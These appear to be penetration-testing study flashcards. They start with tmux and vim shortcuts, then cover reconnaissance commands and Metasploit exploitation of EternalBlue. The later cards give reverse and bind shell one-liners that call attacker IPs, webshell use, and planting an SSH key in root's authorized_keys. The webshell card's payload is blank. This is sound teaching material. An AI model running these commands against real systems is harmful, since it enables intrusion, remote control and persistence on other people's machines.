Cheat Sheet Flashcards

1
Q

uname -a

A

Shows kernel and OS information for the system

2
Q

netstat -rn

A

Show networks accessible via the VPN

3
Q

What is the tmux default prefix?

A

ctrl+b

4
Q

What is the tmux shortcut for a new window?

A

prefix c

5
Q

tmux: switch to window (1)

A

prefix 1

6
Q

tmux: split pane vertically

A

prefix shift+%

7
Q

tmux: split pane horizontally

A

prefix shift+"

8
Q

tmux: switch to the right pane

A

prefix ->

9
Q

tmux: close current pane

A

prefix b+X

10
Q

vim: enter insert mode

A

esc+i

11
Q

vim: back to normal mode

A

esc

12
Q

vim: Cut character

A

x

13
Q

vim: Cut word

A

dw

14
Q

vim: Cut full line

A

dd

15
Q

vim: Copy word

A

yw

16
Q

vim: Copy full line

A

yy

17
Q

vim: Paste

A

p

18
Q

vim: Go to line number 1.

A

:1

19
Q

vim: Write the file ‘i.e. save’

A

:w

20
Q

vim: Quit

A

:q

21
Q

vim: Quit without saving

A

:q!

22
Q

vim: Write and quit

A

:wq

23
Q

Run nmap on an IP

A

nmap 10.129.42.253

24
Q

Run an nmap script scan on an IP

A

nmap -sV -sC -p- 10.129.42.253

25
List various available nmap scripts
locate scripts/citrix
26
Run an nmap script on an IP
nmap --script smb-os-discovery.nse -p445 10.10.10.40
27
Grab banner of an open port
netcat 10.10.10.10 22
28
List SMB Shares
smbclient -N -L \\\\10.129.42.253
29
Connect to an SMB share
smbclient \\\\10.129.42.253\\users
30
Scan SNMP on an IP
snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0
31
Brute force SNMP secret string
onesixtyone -c dict.txt 10.129.42.254
32
Run a directory scan on a website
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt
33
Run a sub-domain scan on a website
gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt
34
Grab website banner
curl -IL https://www.inlanefreight.com
35
List details about the webserver/certificates
whatweb 10.10.10.121
36
List potential directories in robots.txt
curl 10.10.10.121/robots.txt
37
View page source (in Firefox)
ctrl+U
38
Search for public exploits for a web application
searchsploit openssh 7.2
39
MSF: Start the Metasploit Framework
msfconsole
40
MSF: Search for public exploits in MSF
search exploit eternalblue
41
MSF: Start using an MSF module
use exploit/windows/smb/ms17_010_psexec
42
MSF: Show required options for an MSF module
show options
43
MSF: Set a value for an MSF module option
set RHOSTS 10.10.10.40
44
MSF: Unset value
unset RHOSTS
45
MSF: Test if the target server is vulnerable
check
46
MSF: Run the exploit on the target server if it is vulnerable
exploit / run
47
Start a nc listener on a local port
nc -lvnp 1234
48
Send a reverse shell from the remote server
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'
49
Another command to send a reverse shell from the remote server
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
50
Start a bind shell on the remote server
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f
51
Connect to a bind shell started on the remote server
nc 10.10.10.1 1234
52
Upgrade shell TTY (1)
python -c 'import pty; pty.spawn("/bin/bash")'
53
Upgrade shell TTY (2)
ctrl+z then stty raw -echo then fg then enter twice
54
Create a webshell php file
echo "" > /var/www/html/shell.php
55
Execute a command on an uploaded webshell
curl http://SERVER_IP:PORT/shell.php?cmd=id
56
Run linpeas script to enumerate remote server
./linpeas.sh
57
List available sudo privileges
sudo -l
58
Run a command with sudo
sudo -u user /bin/echo Hello World!
59
Switch to root user (if we have access to sudo su)
sudo su -
60
Switch to a user (if we have access to sudo su)
sudo su user -
61
Create a new SSH key
ssh-keygen -f key
62
Add the generated public key to the user
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys
63
SSH to the server with the generated private key
ssh root@10.10.10.10 -i key
64
Start a local webserver
python3 -m http.server 8000
65
Download a file on the remote server from our local machine
wget http://10.10.14.1:8000/linpeas.sh
66
Download a file on the remote server from our local machine
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh
67
Transfer a file to the remote server with scp (requires SSH access)
scp linenum.sh user@remotehost:/tmp/linenum.sh
68
Convert a file to base64
base64 shell -w 0
69
Convert a file from base64 back to its orig
echo f0VMR...SNIO...InmDwU | base64 -d > shell
70
Check the file's md5sum to ensure it converted correctly
md5sum shell